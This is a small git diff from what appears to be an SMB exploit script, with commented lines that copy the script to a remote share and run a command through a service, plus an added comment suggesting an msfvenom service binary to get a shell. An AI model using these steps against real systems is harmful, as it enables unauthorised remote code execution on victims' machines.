add trivial comment
This commit is contained in:
@@ -898,6 +898,9 @@ def smb_pwn(conn, arch):
|
|||||||
|
|
||||||
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
|
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
|
||||||
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
|
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
|
||||||
|
# Note: there are many methods to get shell over SMB admin session
|
||||||
|
# a simple method to get shell (but easily to be detected by AV) is
|
||||||
|
# executing binary generated by "msfvenom -f exe-service ..."
|
||||||
|
|
||||||
def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
|
def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
|
||||||
with open(localSrc, 'rb') as fp:
|
with open(localSrc, 'rb') as fp:
|
||||||
|
|||||||
Reference in New Issue
Block a user